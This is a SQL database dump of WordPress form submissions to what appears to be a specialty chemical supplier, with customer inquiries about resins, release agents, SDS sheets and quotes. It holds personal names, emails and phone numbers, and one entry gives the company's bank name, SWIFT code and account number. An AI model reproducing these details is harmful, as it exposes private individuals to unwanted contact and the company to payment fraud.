INSERT INTO `wp_postmeta` VALUES (34889, 3903, '_field_1', 'Steve Brunner'); 
INSERT INTO `wp_postmeta` VALUES (34890, 3903, '_field_10', 'WPC Technologies'); 
INSERT INTO `wp_postmeta` VALUES (34891, 3903, '_field_2', 'sbrunner@wpctech.com'); 
INSERT INTO `wp_postmeta` VALUES (34892, 3903, '_field_8', '(414) 559-5703'); 
INSERT INTO `wp_postmeta` VALUES (34893, 3903, '_field_3', 'I had submitted an inquiry over a month ago with no response.  I am looking for pricing and ordering information for a 5 gallon container of Epon 828 resin.\n\nThanks,\nSteve'); 
INSERT INTO `wp_postmeta` VALUES (34894, 3903, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34895, 3903, '_sub_id', '3903'); 
INSERT INTO `wp_postmeta` VALUES (34896, 3904, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34897, 3904, '_seq_num', '473'); 
INSERT INTO `wp_postmeta` VALUES (34898, 3904, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34899, 3904, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34900, 3904, '_field_1', 'Kishan Oza'); 
INSERT INTO `wp_postmeta` VALUES (34901, 3904, '_field_10', 'BlueStar Glass'); 
INSERT INTO `wp_postmeta` VALUES (34902, 3904, '_field_2', 'kishan@bluestarglass.net'); 
INSERT INTO `wp_postmeta` VALUES (34903, 3904, '_field_8', '(732) 442-1272'); 
INSERT INTO `wp_postmeta` VALUES (34904, 3904, '_field_3', 'Hello Good Morning!!\r\n\r\nTo whomsoever it may concern,\r\n\r\nI am writing on behalf of my company in regards of we are looking to purchase a citrus orange degreaser in bulk as I came across on your website for that you carry some of them in your inventory as could please kindly send me a quote for if I purchase minimum of one  pallet from you how much it would be? And this will be a frequently ordered for our company purposes. So if you could kindly send me a quotation for the same would really appreciate it.\r\n\r\nLooking forward to hear from you soon.\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34905, 3904, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34906, 3904, '_sub_id', '3904'); 
INSERT INTO `wp_postmeta` VALUES (34907, 3905, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34908, 3905, '_seq_num', '474'); 
INSERT INTO `wp_postmeta` VALUES (34909, 3905, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34910, 3905, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34911, 3905, '_field_1', 'Byron Mobley'); 
INSERT INTO `wp_postmeta` VALUES (34912, 3905, '_field_10', 'Logistics Readiness Center'); 
INSERT INTO `wp_postmeta` VALUES (34913, 3905, '_field_2', 'byron.g.mobley.ctr@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (34914, 3905, '_field_8', '(912) 767-0225'); 
INSERT INTO `wp_postmeta` VALUES (34915, 3905, '_field_3', 'I need a SDS for the following Solvent and Flux Remover\r\n6850-00-419-5004'); 
INSERT INTO `wp_postmeta` VALUES (34916, 3905, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34917, 3905, '_sub_id', '3905'); 
INSERT INTO `wp_postmeta` VALUES (34918, 3906, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34919, 3906, '_seq_num', '475'); 
INSERT INTO `wp_postmeta` VALUES (34920, 3906, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34921, 3906, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34922, 3906, '_field_1', 'Barry Friedland'); 
INSERT INTO `wp_postmeta` VALUES (34923, 3906, '_field_10', 'Straight Key Music'); 
INSERT INTO `wp_postmeta` VALUES (34924, 3906, '_field_2', 'wailinsaax@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (34925, 3906, '_field_8', '(443) 744-0078'); 
INSERT INTO `wp_postmeta` VALUES (34926, 3906, '_field_3', 'Dear Sirs \nI am looking to buy a product that we refer to as DRY FILM RA /IPA and is label as such on our container.\nI searched your website for it but can not find that exact product name. We usually buy this in liquid form in a gallon container not spray. I am doing some experimentation and only wish to purchase a small portion at this time. If you need to set me up as a Dealer I can send you My EIN number and Company Name and Adress. Please advise how to place an order. Thanks'); 
INSERT INTO `wp_postmeta` VALUES (34927, 3906, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34928, 3906, '_sub_id', '3906'); 
INSERT INTO `wp_postmeta` VALUES (34929, 3907, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34930, 3907, '_seq_num', '257'); 
INSERT INTO `wp_postmeta` VALUES (34931, 3907, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34932, 3907, '_field_12', 'Jade Kopf'); 
INSERT INTO `wp_postmeta` VALUES (34933, 3907, '_field_13', 'Southern Aviation Parts and Services'); 
INSERT INTO `wp_postmeta` VALUES (34934, 3907, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34935, 3907, '_field_14', 'jkopf@gacg.com'); 
INSERT INTO `wp_postmeta` VALUES (34936, 3907, '_field_15', '(912) 401-0335'); 
INSERT INTO `wp_postmeta` VALUES (34937, 3907, '_field_16', 'I am trying to determine the part number for DTA catalyst that will work with Epon 828 resin. Please respond as soon as possible.'); 
INSERT INTO `wp_postmeta` VALUES (34938, 3907, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34939, 3907, '_sub_id', '3907'); 
INSERT INTO `wp_postmeta` VALUES (34940, 3908, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34941, 3908, '_seq_num', '476'); 
INSERT INTO `wp_postmeta` VALUES (34942, 3908, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34943, 3908, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34944, 3908, '_field_1', 'Cheryl McWhorter'); 
INSERT INTO `wp_postmeta` VALUES (34945, 3908, '_field_10', 'PPG Aerospace / PRC Desoto'); 
INSERT INTO `wp_postmeta` VALUES (34946, 3908, '_field_2', 'cmcwhorter@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (34947, 3908, '_field_8', '(740) 774-8760'); 
INSERT INTO `wp_postmeta` VALUES (34948, 3908, '_field_3', 'PPG Aerospace/PRC Desoto looking for open invoices we owe you our PO&#039;s ATK44856, AT60034, AT60261, AG16113, ATK46153 and \nAT60403.  Please send invoice copies if any of these remain outstanding.\n'); 
INSERT INTO `wp_postmeta` VALUES (34949, 3908, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34950, 3908, '_sub_id', '3908'); 
INSERT INTO `wp_postmeta` VALUES (34951, 3909, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34952, 3909, '_seq_num', '258'); 
INSERT INTO `wp_postmeta` VALUES (34953, 3909, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34954, 3909, '_field_12', 'Eric Lewicki'); 
INSERT INTO `wp_postmeta` VALUES (34955, 3909, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (34956, 3909, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34957, 3909, '_field_14', 'ericthegoofball@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34958, 3909, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34959, 3909, '_field_16', 'I  have been trying to do some research on automobile oil additives. I know that krytox is an extremely good brand when it comes to lubricants. I was just wondering if by any chance krytox currently makes or is planing on making  automobile oil or an oil additive. thank you for your time.\r\nSincerely,\r\nEric Lewicki'); 
INSERT INTO `wp_postmeta` VALUES (34960, 3909, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34961, 3909, '_sub_id', '3909'); 
INSERT INTO `wp_postmeta` VALUES (34962, 3910, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34963, 3910, '_seq_num', '477'); 
INSERT INTO `wp_postmeta` VALUES (34964, 3910, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34965, 3910, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34966, 3910, '_field_1', 'Olegas Toropovas'); 
INSERT INTO `wp_postmeta` VALUES (34967, 3910, '_field_10', 'JETMS'); 
INSERT INTO `wp_postmeta` VALUES (34968, 3910, '_field_2', 'olegas.toropovas@jetms.aero'); 
INSERT INTO `wp_postmeta` VALUES (34969, 3910, '_field_8', '(370) 655-2379'); 
INSERT INTO `wp_postmeta` VALUES (34970, 3910, '_field_3', 'Hello, dear Team,\n\nplease explain if release agent MS-122AD and MS-122FD are different or not?\n\nWe highly appreciate your prompt response.\nWith kind regards,\nOlegas'); 
INSERT INTO `wp_postmeta` VALUES (34971, 3910, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34972, 3910, '_sub_id', '3910'); 
INSERT INTO `wp_postmeta` VALUES (34973, 3911, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34974, 3911, '_seq_num', '478'); 
INSERT INTO `wp_postmeta` VALUES (34975, 3911, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34976, 3911, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34977, 3911, '_field_1', 'Pat Lang'); 
INSERT INTO `wp_postmeta` VALUES (34978, 3911, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34979, 3911, '_field_2', 'alofpilot@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34980, 3911, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34981, 3911, '_field_3', 'Good morning, I am looking for a cleaner that will remove avgas stains from aircraft fabric and aluminum. Can you please recommend a product?'); 
INSERT INTO `wp_postmeta` VALUES (34982, 3911, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34983, 3911, '_sub_id', '3911'); 
INSERT INTO `wp_postmeta` VALUES (34984, 3912, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34985, 3912, '_seq_num', '259'); 
INSERT INTO `wp_postmeta` VALUES (34986, 3912, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34987, 3912, '_field_12', 'urban zajdela'); 
INSERT INTO `wp_postmeta` VALUES (34988, 3912, '_field_13', 'Woodoo'); 
INSERT INTO `wp_postmeta` VALUES (34989, 3912, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34990, 3912, '_field_14', 'urban.zajdela@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34991, 3912, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34992, 3912, '_field_16', 'Hello,\r\nI am looking for mold reles, which i could use in heated press for epoxy. What would you recomende?\r\nBest regards,\r\nUrban Žajdela '); 
INSERT INTO `wp_postmeta` VALUES (34993, 3912, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34994, 3912, '_sub_id', '3912'); 
INSERT INTO `wp_postmeta` VALUES (34995, 3913, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34996, 3913, '_seq_num', '260'); 
INSERT INTO `wp_postmeta` VALUES (34997, 3913, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34998, 3913, '_field_12', 'Thomas Young'); 
INSERT INTO `wp_postmeta` VALUES (34999, 3913, '_field_13', 'Powis Parker'); 
INSERT INTO `wp_postmeta` VALUES (35000, 3913, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35001, 3913, '_field_14', 'thomas@polywatt.com'); 
INSERT INTO `wp_postmeta` VALUES (35002, 3913, '_field_15', '(510) 326-7407'); 
INSERT INTO `wp_postmeta` VALUES (35003, 3913, '_field_16', 'We make a paper strip about 1.5 inches wide by 11 inches long with a hot melt adhesive coated on one side. We are attempting to emboss a pattern into the hot melt adhesive by first melting the surface and then pressing the strip against a pattern etched into a chrome plated drum. We are finding this to be very difficult because the adhesive want to stick to the drum. What would you recommend from your product line of mold release agents. This is a production line problem involving several million of these paper strips.'); 
INSERT INTO `wp_postmeta` VALUES (35004, 3913, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35005, 3913, '_sub_id', '3913'); 
INSERT INTO `wp_postmeta` VALUES (35006, 3914, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35007, 3914, '_seq_num', '479'); 
INSERT INTO `wp_postmeta` VALUES (35008, 3914, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35009, 3914, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35010, 3914, '_field_1', 'Kelly Wu'); 
INSERT INTO `wp_postmeta` VALUES (35011, 3914, '_field_10', 'Molex Taiwan Ltd, Sanchong Branch'); 
INSERT INTO `wp_postmeta` VALUES (35012, 3914, '_field_2', 'kelly.wu@molex.com'); 
INSERT INTO `wp_postmeta` VALUES (35013, 3914, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35014, 3914, '_field_3', 'Dear Vendor,\n\nThis is Kelly Wu from Molex Business Share Service Center Account Payable. Here is your company\ninformation for payment purpose, please confirm back whether the following information is accurate.\nIf you are not the contact person, pls forward this email to your Finance Dept. Thank you.\n\nMiller-Stephenson Chemical Company, Inc\nUnion Savings Bank\nUNSGUS33\nBank account:694011416'); 
INSERT INTO `wp_postmeta` VALUES (35015, 3914, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35016, 3914, '_sub_id', '3914'); 
INSERT INTO `wp_postmeta` VALUES (35017, 3915, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35018, 3915, '_seq_num', '480'); 
INSERT INTO `wp_postmeta` VALUES (35019, 3915, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35020, 3915, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35021, 3915, '_field_1', 'SHAVEZ AHMED'); 
INSERT INTO `wp_postmeta` VALUES (35022, 3915, '_field_10', 'NATIONAL SUPPLIES COMPANY'); 
INSERT INTO `wp_postmeta` VALUES (35023, 3915, '_field_2', 's.ahmed@n-supplies.com'); 
INSERT INTO `wp_postmeta` VALUES (35024, 3915, '_field_8', '(059) 261-9332'); 
INSERT INTO `wp_postmeta` VALUES (35025, 3915, '_field_3', 'Dear Sir\r\n                Please provide your best air cargo price( DAM MAM-K.S.A) for the supply of the following,,,,,,,an early response i would be verry appreciated to you.,,,,,,,\r\n\r\n1-CLEANER,CONTACT,HYDROCARBON MIXTU,12 TO CLEANER,INDUSTRIAL: CLEANER TYPE: CONTACT; CLEANING AGENT NAME: HYDROCARBON MIXTU; CONTAINER: 12 TO 16 OZ AEROSOL CAN; ADDITIONAL DATA: ITEM ADDITIONAL DESCRIPTION: LIQUID, N ON-CONDUCTIVE; 0.7 TO 0.8 SPECIFIC GRAV ITY MUST NOT ATTACK PLASTIC, RUBBER OR METAL; WILL NOT STAIN OR LEAVE ANY RESI DUE ON CONTACTS; SYSTEM PARENT EQUIPME NT INFORMATION: FOR ELECTRONIC CIRCUIT S, PCB&#039;S, PRECISION RELAYS AND CONTACTO RS ETC; SHOULD REMOVE CONTAMINANTS, OIL , FINGER PRINTS, TAR, CARBON AND DIRT D EPOSITS FROM CONTACTS AND PLACES WHERE APPROACH IS DIFFICULT. SUPERSOLVE AS MILLER STEPHENSON CHEMICAL CO.: P/N#MS-230/CO2\r\n\r\nQUANTITY,,,,,1000 CNT EACH\r\n\r\n\r\n-- \r\n\r\n\r\nThanks &amp; Best Regards\r\n\r\n\r\nShavez Ahmed\r\nSales &amp; Marketing Executive\r\nNational Supplies Company\r\nPhone: 966 3- 896 6677\r\nFax   :  966 3 896 6688\r\nEmail: s.ahmed@n-supplies.com'); 
INSERT INTO `wp_postmeta` VALUES (35026, 3915, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35027, 3915, '_sub_id', '3915'); 
INSERT INTO `wp_postmeta` VALUES (35028, 3916, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35029, 3916, '_seq_num', '481'); 
INSERT INTO `wp_postmeta` VALUES (35030, 3916, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35031, 3916, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35032, 3916, '_field_1', 'John Smyth'); 
INSERT INTO `wp_postmeta` VALUES (35033, 3916, '_field_10', 'Space Electronics'); 
INSERT INTO `wp_postmeta` VALUES (35034, 3916, '_field_2', 'jsmyth@space-electronics.com'); 
INSERT INTO `wp_postmeta` VALUES (35035, 3916, '_field_8', '(860) 829-0001'); 
INSERT INTO `wp_postmeta` VALUES (35036, 3916, '_field_3', 'Re our PO 303645 placed on 6/8/2016.\r\nCan you provide SDS sheets for MS-122-E and MS-122DF-RED\r\n\r\nThank you\r\n\r\nJohn Smyth\r\nQA Engineer'); 
INSERT INTO `wp_postmeta` VALUES (35037, 3916, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35038, 3916, '_sub_id', '3916'); 
INSERT INTO `wp_postmeta` VALUES (35039, 3917, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35040, 3917, '_seq_num', '482'); 
INSERT INTO `wp_postmeta` VALUES (35041, 3917, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35042, 3917, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35043, 3917, '_field_1', 'Jeff Decker'); 
INSERT INTO `wp_postmeta` VALUES (35044, 3917, '_field_10', 'Applied Composites Engineering'); 
INSERT INTO `wp_postmeta` VALUES (35045, 3917, '_field_2', 'jdecker@appliedcomposites.com'); 
INSERT INTO `wp_postmeta` VALUES (35046, 3917, '_field_8', '(317) 243-4225'); 
INSERT INTO `wp_postmeta` VALUES (35047, 3917, '_field_3', 'We have purchased Epicure 3234 hardener from you and are using it with Epon 828 resin.  Do you have any Time/Temp accelerated curing data for this combination?  I can only find 7 days at 77 degrees F and I need to get the full cure done quicker.  A time for 100 and 150 degrees F would be great.  Thank you'); 
INSERT INTO `wp_postmeta` VALUES (35048, 3917, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35049, 3917, '_sub_id', '3917'); 
INSERT INTO `wp_postmeta` VALUES (35050, 3918, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35051, 3918, '_seq_num', '261'); 
INSERT INTO `wp_postmeta` VALUES (35052, 3918, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35053, 3918, '_field_12', 'Patrick Audet'); 
INSERT INTO `wp_postmeta` VALUES (35054, 3918, '_field_13', 'Hyperloop-one'); 
INSERT INTO `wp_postmeta` VALUES (35055, 3918, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35056, 3918, '_field_14', 'pat@hyperloop-one.com'); 
INSERT INTO `wp_postmeta` VALUES (35057, 3918, '_field_15', '(213) 905-8361'); 
INSERT INTO `wp_postmeta` VALUES (35058, 3918, '_field_16', 'The SDS of MS-280 on the website here pulls up an incorrect product.  Can you please send me the MS-280 SDS. thx!'); 
INSERT INTO `wp_postmeta` VALUES (35059, 3918, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35060, 3918, '_sub_id', '3918'); 
INSERT INTO `wp_postmeta` VALUES (35061, 3919, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35062, 3919, '_seq_num', '483'); 
INSERT INTO `wp_postmeta` VALUES (35063, 3919, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35064, 3919, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35065, 3919, '_field_1', 'Fahri'); 
INSERT INTO `wp_postmeta` VALUES (35066, 3919, '_field_10', 'KEIS Pharmaceutical'); 
INSERT INTO `wp_postmeta` VALUES (35067, 3919, '_field_2', 'fgavazaj@keisgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (35068, 3919, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35069, 3919, '_field_3', 'Dear sir\r\n\r\nI need quote for:\r\nAeroDuster, Nonflammable, 1.1.1.2 - Tetrafluoroethane,                                              Cas no.811-97-2,  Catalog no: 8500-6460,   330mL      1 pcs'); 
INSERT INTO `wp_postmeta` VALUES (35070, 3919, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35071, 3919, '_sub_id', '3919'); 
INSERT INTO `wp_postmeta` VALUES (35072, 3920, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35073, 3920, '_seq_num', '484'); 
INSERT INTO `wp_postmeta` VALUES (35074, 3920, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35075, 3920, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35076, 3920, '_field_1', 'Greg Falk'); 
INSERT INTO `wp_postmeta` VALUES (35077, 3920, '_field_10', 'MasterWorks'); 
INSERT INTO `wp_postmeta` VALUES (35078, 3920, '_field_2', 'greg.falk@masterworkscs.com'); 
INSERT INTO `wp_postmeta` VALUES (35079, 3920, '_field_8', '(410) 751-1010'); 
INSERT INTO `wp_postmeta` VALUES (35080, 3920, '_field_3', 'Looking for a water based semi-permanent release agent for filament winding. Multiple release non transferable. Usually steel mandrels but could be aluminum also. Epoxy resin systems used cure can be up to 325 deg F. Application would be at room temp approx. 75 deg F.\n\n'); 
INSERT INTO `wp_postmeta` VALUES (35081, 3920, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35082, 3920, '_sub_id', '3920'); 
INSERT INTO `wp_postmeta` VALUES (35083, 3921, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35084, 3921, '_seq_num', '485'); 
INSERT INTO `wp_postmeta` VALUES (35085, 3921, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35086, 3921, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35087, 3921, '_field_1', 'David Smith'); 
INSERT INTO `wp_postmeta` VALUES (35088, 3921, '_field_10', 'Aculides'); 
INSERT INTO `wp_postmeta` VALUES (35089, 3921, '_field_2', 'david@aculides.com'); 
INSERT INTO `wp_postmeta` VALUES (35090, 3921, '_field_8', '(862) 661-5200'); 
INSERT INTO `wp_postmeta` VALUES (35091, 3921, '_field_3', 'Hi ,\r\n\r\nWould you be interested to acquire B2B contacts to reach your target folks? We have all Industries key decision maker’s contacts across the globe.\r\n\r\nOur database will be updated quarterly basis in a year. We ensure that we provide opt-in contacts which will help you to reach exact audience.\r\n\r\nOther services: if you have any in-house list without emails or missing information, we can append that info to the same and deliver back to you.\r\n\r\nKindly fill your requirement below, so that I will assist you further information.\r\n\r\nTarget Industry:\r\nTarget Job Title:\r\nTarget Geography:\r\n\r\nLet me know your thoughts.\r\n\r\nRegards,\r\nDavid Smith\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (35092, 3921, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35093, 3921, '_sub_id', '3921'); 
INSERT INTO `wp_postmeta` VALUES (35094, 3922, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35095, 3922, '_seq_num', '486'); 
INSERT INTO `wp_postmeta` VALUES (35096, 3922, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35097, 3922, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35098, 3922, '_field_1', 'Ryan McElroy'); 
INSERT INTO `wp_postmeta` VALUES (35099, 3922, '_field_10', 'George Risk Industries, Inc'); 
INSERT INTO `wp_postmeta` VALUES (35100, 3922, '_field_2', 'purchasing@grisk.com'); 
INSERT INTO `wp_postmeta` VALUES (35101, 3922, '_field_8', '(308) 235-4645'); 
INSERT INTO `wp_postmeta` VALUES (35102, 3922, '_field_3', 'Hi I need a quote on 1 quart jar of MS472C Urethane conformal coating and also an aerosol can of it, if you have that.'); 
INSERT INTO `wp_postmeta` VALUES (35103, 3922, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35104, 3922, '_sub_id', '3922'); 
INSERT INTO `wp_postmeta` VALUES (35105, 3923, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35106, 3923, '_seq_num', '487'); 
INSERT INTO `wp_postmeta` VALUES (35107, 3923, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35108, 3923, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35109, 3923, '_field_1', 'Mark Hodges'); 
INSERT INTO `wp_postmeta` VALUES (35110, 3923, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (35111, 3923, '_field_2', 'markhodg@buffalo.edu'); 
INSERT INTO `wp_postmeta` VALUES (35112, 3923, '_field_8', '(845) 238-1876'); 
INSERT INTO `wp_postmeta` VALUES (35113, 3923, '_field_3', 'Hello, I am a junior studying Chemical Engineering at the University at Buffalo, I was wondering if your company offered internships.\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (35114, 3923, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35115, 3923, '_sub_id', '3923'); 
INSERT INTO `wp_postmeta` VALUES (35116, 3924, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35117, 3924, '_seq_num', '488'); 
INSERT INTO `wp_postmeta` VALUES (35118, 3924, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35119, 3924, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35120, 3924, '_field_1', 'Emma'); 
INSERT INTO `wp_postmeta` VALUES (35121, 3924, '_field_10', 'Lightion'); 
INSERT INTO `wp_postmeta` VALUES (35122, 3924, '_field_2', 'emmasung@lightion.com.cn'); 
INSERT INTO `wp_postmeta` VALUES (35123, 3924, '_field_8', '+86 13412271428'); 
INSERT INTO `wp_postmeta` VALUES (35124, 3924, '_field_3', 'Would you like provid to us the quotation of MS-470C by ASAP. Thansk.   '); 
INSERT INTO `wp_postmeta` VALUES (35125, 3924, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35126, 3924, '_sub_id', '3924'); 
INSERT INTO `wp_postmeta` VALUES (35127, 3925, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35128, 3925, '_seq_num', '262'); 
INSERT INTO `wp_postmeta` VALUES (35129, 3925, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35130, 3925, '_field_12', 'Brad Reiman'); 
INSERT INTO `wp_postmeta` VALUES (35131, 3925, '_field_13', 'Nortech Systems'); 
INSERT INTO `wp_postmeta` VALUES (35132, 3925, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35133, 3925, '_field_14', 'breiman@nortechsys.com'); 
INSERT INTO `wp_postmeta` VALUES (35134, 3925, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (35135, 3925, '_field_16', 'We currently use your MS-472C conformal coating.  I have a new project that I am working on that requires conformal coating that meets MIL-I-46058 but I couldn&#039;t find any information on the MS-472C material that stated it met the MIL specification.  Does this material meet MIL-I-04058?'); 
INSERT INTO `wp_postmeta` VALUES (35136, 3925, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35137, 3925, '_sub_id', '3925'); 
INSERT INTO `wp_postmeta` VALUES (35138, 3926, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35139, 3926, '_seq_num', '489'); 
INSERT INTO `wp_postmeta` VALUES (35140, 3926, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35141, 3926, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35142, 3926, '_field_1', 'LaFonda Ford'); 
INSERT INTO `wp_postmeta` VALUES (35143, 3926, '_field_10', '3M Clarkston'); 
INSERT INTO `wp_postmeta` VALUES (35144, 3926, '_field_2', 'lford.cw@mmm.com'); 
INSERT INTO `wp_postmeta` VALUES (35145, 3926, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35146, 3926, '_field_3', 'I would like to request a current SDS for: \nMS-122AD\nDPMS-Z0918A\nPTFE Release Agent/Dry Lubricant\nPlease forward to lford.cw@mmm.com\nThanks,\nLaFonda Ford'); 
INSERT INTO `wp_postmeta` VALUES (35147, 3926, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35148, 3926, '_sub_id', '3926'); 
INSERT INTO `wp_postmeta` VALUES (35149, 3927, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35150, 3927, '_seq_num', '490'); 
INSERT INTO `wp_postmeta` VALUES (35151, 3927, '_action', 'submit'); 
